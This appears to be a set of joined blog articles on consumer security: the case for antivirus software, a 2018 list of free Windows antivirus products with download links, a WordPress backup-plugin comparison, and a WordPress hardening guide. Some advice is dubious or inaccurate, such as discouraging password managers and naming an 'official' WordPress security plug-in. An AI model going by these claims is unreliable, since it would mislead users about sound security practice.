Why Antivirus Software Is As Important Today As Ever

I sometimes have to remind myself that things have changed since the ‘90s. In particular, this is true with companies like Microsoft. In my mind, Windows is the same monster it was back then, crashing regularly and frustrating us with blue screens. MS Office is the cumbersome software package that no one on earth can afford. I use a MacBook now, so I don’t have the opportunities to overhaul those associations.

And the same is certainly true with antivirus software. I still struggle to see antivirus software as a relic of the early days of the internet. I expect it to slow down my computer, while only vaguely giving me an idea of what it’s doing.

The cult of Apple doesn’t help. Apple presents itself as the natural evolution of computing, rather than just another brand on the market. They’ve admittedly done an excellent job of keeping virus attacks on their systems to a minimum. In the process, they’ve allowed us to see antivirus software as superfluous at best, harmful at worst.

But these days, going without antivirus software is asking for trouble. Today, it is more important than ever to cover all of your bases.

Antivirus software has evolved

Firstly, it’s important to point out that antivirus software has evolved. It is no longer the drain on the system that it once was. Some of the old names might put you off, so take a look at this TotalAV review to see what a newer alternative can offer.

It’s relatively cheap, simple to use, and doesn’t slow your computer to the point that you wish for a virus in its place.

And you’ll want to consider getting antivirus software immediately if you don’t have it already. The following should convince you why.

International cyber attacks

It’s no secret that certain countries are using cyber attacks to manipulate political systems throughout the world. Even the US president agrees 50% of the time that Russia influenced the election that brought him to power.

They use covert means like spreading fake news over Facebook and influencing opinions using Facebook groups.

But their attacks are not limited to campaigns to influence opinion. They’re increasingly causing chaos by sending out targeted viruses. A cyber virus that first surfaced in Ukraine recently spread throughout the world. While it was, on the surface, an attempt at extortion, it seemed the real reasons behind the attack were more malicious. It appears that the virus was meant to cause chaos, breaking down systems and harming businesses.

The important point to take away from this is that over the next few years, we can expect cyber attacks to only get worse. Rather than hackers causing trouble or making a bit of money, governments are going to be targeting people and businesses for reasons with far more gravity.

Antivirus software is not what it once was, and neither is the threat of viruses. The threat is far greater now, and it is prudent, to say the least, to protect yourself. Go for one of the new names if you feel uncomfortable with the old favorites of the past. It is well worth it.

Best Free Antivirus 2018 for Windows PC

We are all familiar with the medical term “virus”, a type of infection that can be found in the human body. Similarly, there are viruses that affect the computer systems we use. A computer virus is a piece of code that can be injected into, or programmed into, the software and other tools we use on our computers every day. Computer viruses are malicious code that, once inside a computer system, can modify the settings of your personal computer remotely, making it behave in random ways or even giving online hackers third-party access to it.

As the years have passed and technology has advanced further than ever before, the threats posed by computer viruses and other potentially harmful software to your computer system have not decreased. Instead, the severity of the consequences that such viruses or malware can cause in our daily lives has increased greatly.

In today’s world, almost all of our activity is done online, and all of our sensitive information, including personal details, bank account credentials and other official data, is stored somewhere on the internet. Therefore, the risk of our sensitive information being hijacked remotely has also risen.

If you thought that the computer viruses and other malicious threats that were a headache for computer users a few years ago are irrelevant in this modern age of technology, you are wrong. Popular antivirus vendors such as Symantec and Bitdefender regularly publish online documentation of the latest threats to your computer system, including threats that have been recorded, analyzed and removed by their own antivirus software. Therefore, if you own a computer that does not have antivirus software installed, the best time to install antivirus software on your personal computer, as well as your work computer, is right now!

How Does an Antivirus Software Work?

Ever wondered how antivirus software works?

Basically, antivirus software is always running in the background of your computer system, even when it is not visible to you. When you open a file, whether from your computer’s hard disk or from an external source, the antivirus software compares the entire contents of that file against a huge database of details on known viruses and other malware. If the file you are viewing or have just opened matches an entry in that database, you are immediately warned, along with suggestions on how to keep your computer clear of infection or attack by safely removing the infected files from the system.

Even when your computer is idle, the antivirus software installed on it runs scheduled automatic scans of the entire computer to find any pre-existing virus or other malware that may have escaped the initial scanning.

Why Should You Not Use a Pirated Antivirus Software?

These antivirus features do come at a cost. What many of us do instead is find a cracked or pirated version of some random antivirus software online, download it and install it on our computer. Such pirated antivirus software lacks many of the premium virus scanning and removal features that only officially purchased copies have, and very often the cracked antivirus software we end up installing ironically has a piece of virus or malware attached to it.

Moreover, it is very important that we buy and use only the latest version of the antivirus software available, and only from popular, widely used and well-regarded brands, so that we get the latest and best defense against all the threats that may harm your computer system.

What Are the Most Important Features that Antivirus Software Must Have?

As mentioned above, our lives today are lived online, and the risks of identity and data theft online are at their highest. Hence it is all the more important for the latest antivirus software to provide protection from the online data and identity theft that can happen to anyone.

The latest antivirus software provides its users with many features. However, if you are unsure what the latest antivirus software must have in order to protect your computer from any kind of harmful attack, below are some of the features you must make sure the antivirus software you are about to buy includes.

  • Malware Protection:
    The first and most basic feature of any antivirus product you buy is protection from the malware that can infect your computer system. Today, malware protection is not limited to viruses but also covers other threats such as spyware, adware, Trojans and so on.
  • Complete Protection for your Online Activities:
    Nowadays, threats to your data or computer do not only arrive as software you install. Malicious code is injected into the websites and other online pages that you may visit, intentionally or not. Hence, if you are planning to buy antivirus software in 2018, it is important that it completely protects all the activity that happens within the web browser on your computer. The latest antivirus software in 2018 should also be able to protect you from any kind of phishing attempt.
  • Consumer Awareness of the Latest Threats Out There:
    In older times there was a limit on what you could actually do with a computer system; today, protection against known harms and threats alone is not enough. The 2018 antivirus software you purchase must also send you regular updates on the latest forms of security and data threats, along with details on how you can stay protected from attacks that may compromise your identity or any sensitive information you possess.

Best Free Antivirus 2018 for Windows PC

If you are currently using a PC running the Windows operating system, and you are unsure whether the free antivirus software options available these days are of any use, do not worry. You are not the only one with this question in mind; in fact, we have been receiving many queries about the free antivirus software available for Windows PCs in 2018, and requests to suggest some of the best free antivirus software for Windows PCs in 2018.

Among all the free antivirus software available online that supports the Windows operating system, there are some really functional and user-friendly products that can genuinely help you protect yourself against the threats that can harm and compromise the security of your computer.

So, taking all those queries into consideration, today we present a detailed list of the best free antivirus software of 2018 currently available for the Windows operating system.

1. AVG Free Antivirus for 2018:

AVG Antivirus is one of the best free antivirus products you can find for the Windows operating system in 2018. The antivirus solution from AVG has made it onto the best free antivirus list of almost every publisher for many years now.

One of the main reasons the AVG antivirus is so popular is that it is used and trusted by millions of users around the globe. And beyond their user statistics, the features and functionality provided by AVG antivirus also show why it is often crowned the best antivirus solution available.

As said above, in today’s world antivirus software needs much more than plain virus protection to be the best. Apart from regular virus protection, AVG antivirus also offers separately downloadable add-ons for features such as email and web browser monitoring clients, so that you need not waste disk space on those features if you already have a better client performing the same function for you.

Compared with previous versions of AVG antivirus, the weakness of the older releases was that, although you received regular antivirus updates, moving to the latest set of features offered by AVG required you to uninstall the version you were using and install the latest version from AVG.

In the latest 2018 version of AVG free antivirus, however, you always have the most up-to-date version of the software, both in terms of protection and in terms of features. Apart from that, the new 2018 AVG antivirus has an updated user interface that makes it easier than previous versions to scan your computer for threats such as malware, unwanted browser toolbars or extensions, and hidden files. The 2018 release also lets you block unsafe or infected file downloads even before you try to download them to your computer.

Download Now: http://www.avg.com/in-en/free-antivirus-download

2. Avira Antivirus Free 2018

The latest 2018 free antivirus from Avira is another globally popular free antivirus product. Avira is developed by a German lab with over 30 years of experience protecting computers and other devices from all kinds of threats. Avira claims to detect and handle about 30 million threats a day, and its popularity is clear from the more than 100 million active users Avira has globally. To take its free security services to a whole new level, Avira is now introducing what it claims is the first ever complete suite of security services for free.

The latest free Avira antivirus software 2018 includes advanced features such as protection against ransomware, a data-hostage type of malware that Avira says is the fastest-growing malware out there currently. The 2018 Avira suite edition also lets you keep your system optimized by fixing issues with your computer’s memory management, for maximum performance. Apart from the features you get on downloading the latest Avira suite 2018, Avira also ensures that you will be among the first customers to receive any future security and feature updates it rolls out for free.

Another cool feature of the latest Avira antivirus suite 2018 is that it also helps you block any kind of surveillance on your online activity by masking your IP address using the Avira Phantom VPN service. This will help you access websites that are restricted in your country, or simply block advertisement agencies from accessing your location data. However, the bandwidth for the Avira Phantom VPN service in the free suite is limited to 500MB per month.

Download Now: https://package.avira.com/package/oeavira/win/int/avira_en_fass0_58907ab807b88__ws.exe

3. Avast Free Antivirus 2018

Avast is easily one of the top 3 contenders for the title of best antivirus software available. Avast Free Antivirus 2018 is also among the most trusted antivirus clients for the Windows operating system.

What makes Avast antivirus so popular is that the client is quite lightweight compared with other antivirus software, saving disk space and resources on your computer. Avast has also been awarded the title of the antivirus with the least impact on computer performance. In the latest 2018 free version, Avast has introduced the Nitro update, which moves much of the malware analysis into the cloud, making Avast Antivirus 2018 even lighter in storage space and more efficient in overall performance. The CyberCapture feature notices unknown types of file that you may come across while browsing and sends them to Avast’s labs for real-time analysis.

IoT, the Internet of Things, is the latest technological advance, and potentially the most dangerous one when it comes to malicious attacks. With its latest free 2018 antivirus software, Avast has you covered for all the smart electronics in your home connected to the same home network.

Other features of the latest Avast antivirus 2018 edition include improved and more sophisticated malware protection along with protection on all your browser activities. It also lets you clean all the unwanted browser extensions and toolbars that may be affecting the performance of your web browser or compromising your online privacy.

Download Now: https://www.avast.com/en-in/download-thank-you.php?product=FAV-ONLINE&locale=en-in

4. Panda Antivirus Free 2018

Yet another top-rated antivirus solution is Panda Antivirus. What makes Panda one of the best free antivirus products is that it is quite light. Similar to the Avast antivirus mentioned above, Panda does most of its work in the cloud so as to take the load off your computer’s hard drive. This frees up your computer’s resources and keeps its performance at its best compared with the other antivirus software available.

The Panda antivirus solution also offers up-to-date, cutting-edge security against all kinds of malware attacks and threats that your computer may come across. The most salient feature of Panda antivirus is that all updates to the software happen seamlessly in the background, without you noticing or being interrupted in what you are doing.

Download: http://download.pandasecurity.com/thankyou/index.php?productID=FREEAV&interstitial=1&_ga=1.192375277.652863504.1485866159

5. Bitdefender Free Antivirus 2018

Last but not least is the Bitdefender antivirus solution. Bitdefender is not at all behind the other top-level free antivirus solutions mentioned above. Bitdefender free antivirus 2018 for the Windows operating system is specially designed to take a lighter toll on your system resources so as to give you better performance.

Bitdefender has some of the best protection and defense mechanisms against active threats such as phishing, viruses and other malware. Its regularly updated databases make sure that no malware that may pose a threat to your computer system goes unnoticed.

Yet another important feature of the Bitdefender antivirus 2018 free edition is its online fraud detection. The anti-fraud system within the Bitdefender antivirus software 2018 provides you with real-time warnings whenever you are visiting a scam website, thus keeping you protected from any kinds of online fraud activities.

Download: https://www.bitdefender.com/solutions/free/thank-you.html

Final Words:

That was a comprehensive, detailed guide covering some very important topics: how antivirus software works, the importance of antivirus software in 2018, and some of the best free antivirus software of 2018 for the Windows operating system. We have tried to feature the latest and best free antivirus solutions from all the popular antivirus developers around the globe. In case we missed any of your favorite free antivirus software for Windows in 2018, please do mention them via the email address mentioned below.

Best wordpress backup plugin

One of the main security tips for a WordPress site is to back up your site regularly. No matter how secure your website is, there is always room for improvement. But at the end of the day, keeping an off-site backup somewhere is perhaps the best antidote no matter what happens. If you have a backup, you can always restore your WordPress website to a working state any time you want. And time is the most important thing: people don’t like it when websites are down!

Today we will compare several of the most popular WordPress backup plugins. We selected the 5 best WordPress backup plugins on the market. We’ll talk about their pros, cons, main features and pricing, and why and when you would want to use them.

Let’s start with the basics. Here’s the side-by-side:

                              VaultPress**   BlogVault               BackupBuddy   CodeGuard   UpdraftPlus
Database backups              Y              Y                       Y             Y           Y
Filesystem backups            Y              Y                       Y             Y           Y
Automated/scheduled backups   Y              Y                       Y             Y           Y
Manual backups                Y              Y                       Y             Y           Y
Easy restoration features     Y              Y                       Y             Y           Y
Security scans/monitoring     Y              N                       Y             Y           N
Site migration features       Y              Y                       Y             N           Y
Backup history                Y              Y                       Y             Y           Y
Backup encryption             N              Y                       N             Y           Y
Off-site backup storage       Y              Y                       Y             Y           Y
Storage for your backups      ?              no limit (fair usage)   1GB           5GB         1GB
Customer support              Y              Y                       Y             Y           N*
Price (score)                 8              9                       10            7           10
Ease of use (score)           9              10                      9             10          8
Features (score)              9              9                       9             9           9
Support (score)               10             10                      10            10          9
OVERALL                       9.0            9.5                     9.5           9.0         9.0

Price per month, by plan tier:
  VaultPress:   $3.50 / $9.00 / $29.00
  BlogVault:    $9.00 / $19.00 / $39.00
  BackupBuddy:  $7.00 / $8.00 / $12.00
  CodeGuard:    $5.00 / $39.00 / $79.00 / $119 / $239
  UpdraftPlus:  $0 / $7.00 / $9.75 / $15.00

* no support for the free version
** after the change in its business model, VaultPress features are delivered via Jetpack

Guide to wordpress security

Roughly 30,000 websites are hacked every day. Could your website become one of them? In a perfect world, using a popular content management system like WordPress would end many security woes — but unfortunately, that’s not the case. By default WordPress isn’t very well secured; it’s built to easily publish content, not necessarily to protect it. If you want to protect your content as a blogger, you’re going to need to take some extra steps.

But becoming a blogger shouldn’t mean that you have to be some sort of technical savant. You’re a content producer, not a hacker. Because of that, we’ve compiled a complete, all-in-one guide to “hardening” and protecting your WordPress blog. And it’s a little long — but most of the steps that you’re going to have to take are only going to have to be taken once.

By the end of this guide, you’ll know absolutely everything there is to know about WordPress safety and security, from better password habits to modifying the default WordPress configuration files. Whether you’re setting up a one-man show or creating an immense magazine of content, you’ll be able to rest assured that your data, your site, and even your users are protected.

But first… let’s talk about the risks.

Why Do I Have to Secure My WordPress Account?

It’s a blog — not a bank account! Why would anyone try to hack your site? It’s easy to assume that your one blog isn’t going to become the target of a serious attack but, in truth, there are more reasons for a cybercriminal to target you than you might think. WordPress blogs are frequently hacked for the following reasons:

  • To collect your personal information — or the information of your users. Identity theft is a big reason why a cybercriminal might go after a well-trafficked blog. You don’t even need to collect a lot of information to make this viable: the criminals may only be seeking to collect email addresses. They can sell active email addresses to advertising companies or use them as their own spamming lists.
  • To post “black hat SEO” web pages. If your website is currently a highly ranked website (or even a moderately ranked one), a cybercriminal may want to take over your website domain so that they can post their own content on it. This is very similar to domain hijacking and it’s designed to leverage the popularity of an existing website in order to sell goods and services, spread malicious programs, or point to affiliate advertising.
  • To steal your website and hold it for ransom. Yes, this happens. And it’s usually not obvious. No one jumps out at you from a digital alley and says “$30 or the website gets it!” Instead, they throw a splash page on your website that says that it’s been hacked, and then direct you to services that you can purchase that will restore your website… all under the guise of “helping” you from the evil cyber criminals. This works because many people don’t back up their websites, so they can’t restore their content themselves.
  • To embed malware and malvertising. Some people just want to watch the world burn. A cybercriminal can pull off a rather subtle attack by simply embedding malware and malvertising into your website. Your website will still be up — so you may not notice that it is currently distributing malicious programs to your users (likely including yourself). Eventually, however, search engines are going to notice and your website is going to be blacklisted.
  • To simply take your website down. DDoS attacks are one of the easiest ways that a cyber-attacker can take a website down. This can happen for a variety of reasons: the attacker may be a competitor, the attacker may disagree with your positions, or the attacker may be trying to use it to gain access to your website by exposing other vulnerabilities.

Apart from this, your website can also be targeted as part of a larger attack. Criminal attackers may simply be scanning for vulnerable WordPress accounts — because they already know about the vulnerabilities that exist in WordPress. They may simply attempt exploits on all of the websites they find, hoping to find something useful or interesting.

So how do you avoid becoming a target? It all begins with the setup.


Chapter One: Setting Up and Configuring Your WordPress Installation

WordPress is in the business of making it easy for you to post your thoughts and experiences. It isn’t necessarily in the business of securing them. The default configuration of your WordPress installation makes it very easy for you to use, but it also makes it easier for others to access. Before you even begin fiddling with your first post, you need to change some settings.

Change Your Administrative Username

By default, WordPress sets your username to “admin.” This is a problem: in order to log in, someone only needs to guess your password. But you can defeat this by having a username that is different and that is not visible to the public.

In WordPress, you can’t directly change usernames; instead, you have to create a new username and delete the old one before you begin. That makes it a little more complicated, but this is as good a time as any to become familiar with the administrative settings dashboard.

How to Change Your Administrative Username

On the administrative dashboard, click on “Users.” You’ll retrieve a list of current users, which should be only a single user named “admin.”

Next to the Users heading, click on the “Add New” button.

Fill in your user information as directed and select the role of “Administrator.” Click on “Add New User.”

Hover on the old “admin” user name. Click on “Delete.”

Confirm deletion.

Click on your new administrator name.

Scroll down to change the nickname and select to “display name publicly as” this nickname.

Add Two-Factor Authentication

Two-factor authentication adds an additional layer of security on top of a traditional username and password combination. Think of two-step authentication as a lock in which you have to turn two separate keys. One of these keys is your login credentials — your username and password. The other key can be either of the two following options:

  • “Something you are.” A fingerprint scan, eye scan, or other biometric service can be used to verify that a user is who they say they are. This is frequently used to lock phones, doors, and other physical devices.
  • “Something you have.” A smartphone or similar device can be used to verify a user’s identity. Frequently this means sending the user an SMS message with a PIN. The user then has to enter that PIN alongside their login credentials.

Two-factor authentication can only be set up natively on WordPress.com. Otherwise it requires the use of plug-ins such as MiniOrange 2FA, Google Authenticator and Sucuri.

Installing Two-Factor Authentication With Google Authenticator

Go to Add Plug-Ins and select “Add New.”

Search for “MiniOrange Google.”

Click “Install” and then “Activate.”

MiniOrange will send you an email to verify your email.

Then, you can set up your account.

Select the 2FA tab to choose a type of two-factor authentication. The simplest and most secure method is Google Authenticator. MiniOrange also offers premium options including SMS, as well as the less secure email method.

Click on the alert to configure security questions, which will ensure that you do not get locked out of your account.

(Optional) You can also set up which roles have two-factor authentication.

WARNING! Using WordPress’s optional Jetpack, it’s possible to connect your own WordPress website to your WordPress.com login. From then on, you can log into all of your WordPress sites through your WordPress.com credentials. This is not advised. If one of your sites is compromised, all of your sites will be compromised.

Install a CAPTCHA Solution

Everyone knows CAPTCHA. CAPTCHA prevents bots from performing actions on your site, such as trying to log in or trying to submit a form. A bot can be very persistent: not only can they eventually break through your security, but they could overly tax your website, resulting in denied traffic and slow connections.

Though some CAPTCHA systems can seem a bit “annoying” — such as the ones that are difficult to read — they can be essential for high-volume blogs. The CAPTCHA WordPress Plugin lets you add CAPTCHA controls to login forms, registration forms, comment forms, contact forms, and more. Further, you can control the type of CAPTCHA code that’s displayed, so that it has limited impact on your legitimate users.

Installing a CAPTCHA Solution

Go to Add-Plugins and Select “Add New.”

Search for “Captcha by BestWebSoft.”

Click on “Install.”

Review Captcha Settings. Enable Captcha for login forms, registration forms, forgot password forms, and comment forms.

Save changes.

From now on, when you login, you’ll be greeted with a captcha code.

Get Spam Protection for Your Comments

At first glance, spam protection seems more like a usability issue than a security issue. “Spam” comments generally come from bots that are seeking to boost the website rankings of other websites. Bots will generate “word salad” comments that have nothing to do with your posts but ultimately link to the site that they are promoting.

Where it becomes a security issue is two-fold: spam comments can bog your blog down with excess traffic and they can contain potentially malicious links. WordPress does not have built-in spam protection, but it is provided for free through the Akismet WordPress plug-in. There are also some other options, such as the official WordPress security plug-in, and all-in-one systems like Sucuri.

Installing the Akismet WordPress Plug-In

Go to Add Plug-Ins and select “New.”

Search for “Akismet.”

Install and activate the Akismet plug-in.

Click on “Set Up Your Akismet Account.”

Click on any of the options.

Get an Akismet API Key for free.

Go to the Akismet Settings and enter in the Akismet API Key. Spam protection will begin instantly.

Remove Your WordPress Version Number

WordPress telegraphs the version number that you have installed for the world to see. While this might be interesting information, it can also be harmful. A malicious user could see that you’re using a version of WordPress that still has a certain vulnerability — and they can then target you. The easy solution? Just remove the number.

This takes a bit of editing, so remember to back up your website first. Once your website has been backed up:

Go to “Appearance” and then “Editor.”

Go to the right and click on “Theme Functions” (also labeled “functions.php”).

Note that some more advanced themes may have a custom functions file. Consult your theme documentation for more details.

Type the following line at the end of the file (use plain straight quotes, and pass the built-in WordPress callback __return_empty_string rather than an empty string, which is not a valid callback and triggers a PHP warning):

add_filter( 'the_generator', '__return_empty_string' );

This is WordPress code that adds a filter to the part of WordPress that outputs your version string, replacing it with an empty string so that nothing is displayed.

Click on “Update File.”

This will strip out your version number from your WordPress header and from your WordPress RSS feeds at the same time. Now you just have a few more adjustments to do.

Disable the WordPress API

WordPress offers a REST API for developers who want to integrate their own programs into WordPress. However, there are some issues with the REST API — most notably that the REST API can actually bypass WordPress’s authentication system, including two-factor authentication. Unless you are using it for a custom-built application, it’s a solid practice to simply disable the WordPress API entirely. This can be done through a plug-in, such as Disable REST API.

All you need to do is “Install Now” and then “Activate.”

Disable XML-RPC

XML-RPC is a special WordPress feature that enables remote access and posting. This can be a security issue, as it creates another way that a malicious user could potentially access your site. If you’re interested in publishing posts remotely, you may need to leave XML-RPC enabled (it is enabled by default). If you are not publishing posts remotely, there’s no reason to leave this additional entry point open.

The easiest way to disable XML-RPC is to install the Disable XML-RPC plug-in. There are other ways, but they require editing code rather than simply activating a plug-in.

Again, all you need to do is click on “Install Now” and then “Activate.”


Chapter Two: Passwords and Password Hygiene

So far many of the changes that we have made have been designed to counter security issues in the WordPress platform itself. But the platform only represents half of the risk. An equal amount of risk comes from the user — and, unfortunately, that’s you. There are many ways you could potentially (and accidentally) create your own security vulnerabilities. One of the major ways lies in passwords.

As of the most recent versions, WordPress Core actually requires “strong” passwords by default. That means that WordPress won’t let you set a password that its own algorithm deems too weak — and that’s a good thing. But there are still some things you should know about how passwords protect you, and how you can protect them.

Crafting a Strong and Memorable Password

What makes a password good? A good password is both complex and easy to memorize. WordPress will make sure that your password is complex, but the passwords that it automatically generates are most definitely not easy to memorize — in fact, they’re generally impossible to remember. That can lead to people foregoing the automatically generated passwords altogether and attempting to make their own.

Complexity is important because the more complicated your password is, the less likely it is to be guessed by an intruder. But memorization is also important; if you can’t remember your password, you’re more likely to save it in an app, write it down in your notepad, or simply reset it the first time you forget what it is.

Most people do not choose good passwords. To understand what makes a good password, let’s use an example:

  • “shells” – This is an obviously bad password. It’s a single dictionary word. It can easily be guessed, especially if there’s some reason for choosing the word shells. And you might think “what person is going to guess ‘shells’?” But people are rarely used for this process. Instead, automated scripts are used to go through an entire dictionary’s worth of words to eventually find the right one.
  • “sh311s” – This is often considered to be a good password, but it really isn’t. It’s not long enough, and the complexity is simply confusing — you’ll find yourself wondering whether you used an ‘e’ or a ‘3’. To a computer, “shells” and “sh311s” are functionally identical.
  • “#Sh@*zHQWoa*” – This is the type of password that’s usually provided through auto generation. In practice, it can be useless; it’s only helpful if saved in a password manager, which opens the door to other security issues entirely.
  • “She_sells_sea_shells.” – This is actually the best password on this list (well, assuming it wasn’t part of a very popular nursery rhyme). It is long, complex, and easy to remember.

Complexity doesn’t mean that your p4ssw0rD has to look complex to you; this is a common misunderstanding. Instead, complexity goes up exponentially by length — and longer pass “phrases” are generally easier to remember and impossible to easily guess.

Practicing Good Password Hygiene

Every morning you probably brush your teeth, floss, and wash your face — though maybe not in that order. But just as you need to practice good physical hygiene, you also need to practice something called good password hygiene. In IT, good password hygiene means maintaining your passwords properly… and making sure they aren’t unnecessarily exposed to risk. Password hygiene is called hygiene because it requires the development of good habits.

  • Always memorize your passwords. In the prior section, we discussed why making passwords memorable is important. Even if you have to use some sort of mnemonic device, passwords should always be committed directly to your memory.
  • Never save your passwords in plain text. If your passwords are saved somewhere on your computer, such as in a notepad on your computer’s desktop, anyone will be able to view them and log into your WordPress account. This also goes for post-it notes on physical desk tops.
  • Don’t give out your passwords to others. Though you may trust someone, that doesn’t necessarily mean that their password hygiene is up to snuff. When you give out a password, you run the risk that someone else might lose that password.

Remember: passwords are the first line of defense you have when securing your WordPress account. Though they aren’t the only security you should rely upon, a well-crafted and well maintained password can do much of the heavy lifting in terms of your system security.

Making Sure Your Password Can’t Be Reset

…At least, not without your knowledge. One substantial security risk involving passwords is the ability to reset a password. Other user accounts can be particularly bad about this; a malicious user might be able to reset your password simply by knowing a little about you, such as your birth date. WordPress requires that you have access to your administrative email account to reset your password. And that also means that your security is only as good as your email security.

WARNING! Anyone who has access to your email account can easily find a way to access your WordPress account — and can lock you out of both. Just as it’s important not to share your WordPress login information, it’s also important not to let anyone use your email account.

Locking Out Multiple Sign On Attempts

WordPress does not have built-in functionality for locking out multiple sign-in attempts. And that means that a persistent individual can sit there virtually all day just trying different username and password combinations. A login limiting plug-in will limit a user to a certain number of tries during a certain amount of time — such as three tries every hour. It can also permanently lock down a system (until properly unlocked) if a certain number of incorrect attempts are made. This can be achieved through the installation of a single-use plug-in such as WP Limit Login or a more comprehensive security solution such as Sucuri.

Installing WP Limit Login Attempts

Install and activate WP Limit Login Attempts, and then modify your settings:

  • Number of login attempts: the number of attempts allowed before the lockdown begins.
  • Lockdown time in minutes: the number of minutes the user will be locked out for.
  • Number of attempts for captcha: when a captcha will engage to prevent bot attempts.
  • Enable captcha: whether you want to add a captcha at all.

YOU SHOULD KNOW: At any time, you can go to your plug-ins in the administrative dashboard and select “deactivate.” If your blog appears to be acting strangely or loading slowly, you may want to deactivate plug-ins one by one to determine which plug-in might be the culprit. Incorrect settings could lead to performance issues later on.


Chapter Three: Adding an Internal Monitoring System

Up to now, you may have noticed that securing WordPress involves a lot of small changes, management, and maintenance. You can bolster the overall security of WordPress through the use of an internal security monitoring system, which will actually make many of these changes on your behalf. Wordfence and Sucuri are two of the most popular management systems; though WordPress offers an official security plug-in, its uses are fairly limited.

Monitoring Security with Sucuri

Offering “complete website security,” Sucuri is able to both clean previously hacked websites and protect websites from attacks.

Sucuri is the leading commercial option for all-in-one WordPress security. For SMBs and professionals, Sucuri is likely one of the better options — it comes with a wealth of robust features that both protect your website while also reducing the amount of time you need to spend on setup and administration. Some of the most prominent features of Sucuri include:

  • Site Cleaning. If you’ve already been hacked, Sucuri can restore your website and clean up any malicious infections. These features include the ability to reset the password of any user, reset existing plug-ins, and trace back potentially malicious activity.
  • Site Reputation. If your site has already been blacklisted by Google or disabled by its host, Sucuri can detect this and help you become reestablished.
  • Site Protection. If you want to protect yourself from being hacked, Sucuri offers DDoS and brute force protection, in addition to protection against many current security exploits and vulnerabilities.
  • SSL Certificates. Sucuri provides SSL certificates for their customers under their professional plans. SSL certificates make it possible to encrypt and protect your blog’s transmitted data.
  • Advanced Website Protection. Sucuri scans, detects, and mitigates attacks against websites through their Website Application Firewall, including DDoS attacks and brute force password attacks.
  • Scanning and Monitoring. Sucuri actively scans websites for signs that they may have been attacked, such as through malware or malvertising.
  • Site Hardening. Sucuri additionally makes many changes to improve WordPress’s overall security, such as: updating WordPress and PHP, removing the visible WordPress version, protecting the uploads directory, restricting access to internal directories, updating and using security keys, and checking for information leakage.

Sucuri is a comprehensive security plug-in that can be installed for free. To install Sucuri, download the “Sucuri WP Plugin.”

Click on “Sucuri” in your new administrative panel. Sucuri will first ensure that WordPress has not been modified in any way.

It will also make sure that the site is clean and it is not blacklisted.

Before going further, you will need to generate an API key. This will enable firewall protection. Simply provide your domain and email address to get started.

Once the API key is generated, you’re free to go through the Sucuri WP plug-in settings, which are comprehensive.

  • Scanner. This system looks for changes that have been made to your WordPress installation. If you are experiencing issues with WordPress, you can consult with the scanner to find out more.
  • Hardening. This feature goes over many of the changes that we have made and more, allowing you to automatically do things such as: verify your PHP version, delete the default administrative account, and block PHP files in the wp-includes directory.
  • Post-Hack. Secret security keys can be used to improve upon your security and authentication, and any user passwords can be reset, in addition to any installed plug-ins.
  • Alerts. Here you’ll be able to control where security alerts go – generally to your administrative email account.
  • API Service Communication. Your API key and its details are stored here – there shouldn’t be any changes that you need to make.
  • Website Info. This contains all of the credentials and other information related to your website.

Monitoring Security with Wordfence

Wordfence is the leading “freemium” plug-in for all-in-one WordPress security, with a large inventory of free features in addition to paid options.

Accessible and affordable, Wordfence presently has millions of users across the globe. Wordfence provides firewall, malware scanning, and login security services, all designed to build on top of WordPress Core. Even the free version of the plug-in is relatively feature complete. Some notable features include:

  • Web Application Firewall. The Wordfence Web Application Firewall detects attacks such as SQL injections, malicious file uploads, and DDoS attempts.
  • Website Scanning. Wordfence can provide hardening for your website by detecting problems in its public configuration, backups, posts, comments, and passwords.

There are also some premium features available:

  • Protection against spam. Wordfence can check comments against lists of known spammers, in order to better detect and remove spam. This feature takes the place of plug-ins such as Akismet.
  • Protection against blacklisting. Wordfence can additionally check to see if your website may be getting spammed to other sites. This is a commonly used tactic to get a website blacklisted; if Google sees your website being used in this fashion, it may remove you from search engine results.
  • Rate limiting. Wordfence can limit high volume traffic to a certain rate, so that users such as bots can still access the site, but without interfering with its responsiveness. This can be especially useful to limit crawlers — bots that look through websites to index them for search engines.

Wordfence can adversely impact the performance of high traffic sites — but caching and better performance optimization can also be used to address this. In recent iterations, Wordfence has reduced its overhead.

Monitoring Security with WordPress Security

WordPress officially provides some advanced security features through its WordPress Security plug-in — but the features provided are fairly rudimentary and shouldn’t be relied upon to secure an entire site.

You can obtain some basic security features through the use of Jetpack Personal or Jetpack Business, both of which include the official WordPress Security Plug-In. WordPress Security includes spam filtering, technical support, daily off-site backups, and one-click restoration. But it is not designed to monitor and protect against advanced threats. WordPress security is mostly designed to quickly deploy backups of your system in the event that something goes wrong. It can be very useful in the event that your website is hacked or that an employee makes a mistake that damages your site, but it is mostly responsive rather than preventative.


Chapter Four: Securing Your Web Hosting Account

Unless you are hosted directly on WordPress.com, your WordPress site is going to run on top of a hosting account. And that means that your hosting services are going to have to be just as secure as your WordPress installation. By gaining access to your web hosting account, an attacker can do anything they want — including deleting your website entirely.

Finding the Right Hosting Service

First things first — you usually want to work with a hosting service that is either experienced with WordPress or specifically targeted towards WordPress bloggers. Not only will their server environments be well-suited to the needs of WordPress, but they will also be able to provide better security tailored around the system.

There are thousands upon thousands of hosting services available, and though they may seem to be identical, some of them are far safer than others. When looking for a web host, you should consider the following:

  • Are they popular? Major web hosting services such as HostGator, DreamHost, and GoDaddy all have to have top-of-the-line security solutions because of the sheer number of clients they serve. That doesn’t necessarily mean they are the best hosts (many of them have fairly limited resources), but they are more likely to be secure than other low cost services.
  • Is the account shared? Shared hosting packages may have additional security vulnerabilities, as multiple clients are in the same server environment. Most bloggers will not want to spend the money for a dedicated server, but they can still invest in a VPS (virtual private server) to reduce their risk.
  • Do they have built-in security features? A reputable hosting service will discuss the security features they offer, such as complimentary SSL certificates, automated backups, and firewalls.

As with many things, you don’t want to go with the most affordable hosting service. Look for a good blend of features and reputation; there are many very cost-effective options that aren’t necessarily bottom tier.

Adding External Monitoring Systems

Monitoring systems, firewalls, and scanners can all be used to protect your website from intrusion attempts. Popular options include Cloudflare and Sucuri, and some web hosts also provide their own utilities. These solutions are designed to detect, identify, and mitigate threats. They can recognize potentially suspicious traffic and deny it — while still keeping a website up and active.

External monitoring systems are particularly useful against DDoS attacks. A monitoring system will be able to identify a DDoS attack and will be able to deny all illegitimate requests while still allowing ordinary traffic to flow through. External monitoring systems can also be used to detect and reject potentially unsecured connections.

